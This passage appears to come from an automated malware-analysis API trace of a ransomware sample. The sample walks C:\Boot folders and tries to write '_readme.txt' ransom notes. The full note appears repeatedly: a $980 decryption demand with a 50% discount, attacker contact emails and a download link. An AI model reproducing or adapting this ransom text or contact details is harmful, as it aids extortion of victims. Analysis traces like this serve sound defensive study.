encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.859] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.860] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.860] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.861] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0228.861] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.861] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0228.861] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.861] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.861] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.861] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.861] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0228.861] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.861] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.861] PathFindFileNameW (pszPath="") returned="" [0228.861] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.862] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.862] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.862] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.862] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0228.862] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0228.862] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.862] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.862] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.862] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.863] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0228.863] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.863] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.863] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.863] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.863] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0228.863] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.863] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.863] PathFindFileNameW (pszPath="") returned="" [0228.863] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.863] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.864] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.864] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.864] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0228.864] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0228.864] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.864] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.864] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.864] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.864] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0228.864] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.864] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.865] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.865] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.865] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0228.865] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.865] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.865] PathFindFileNameW (pszPath="") returned="" [0228.865] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.865] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.865] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.865] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.865] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0228.865] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0228.866] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.866] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like 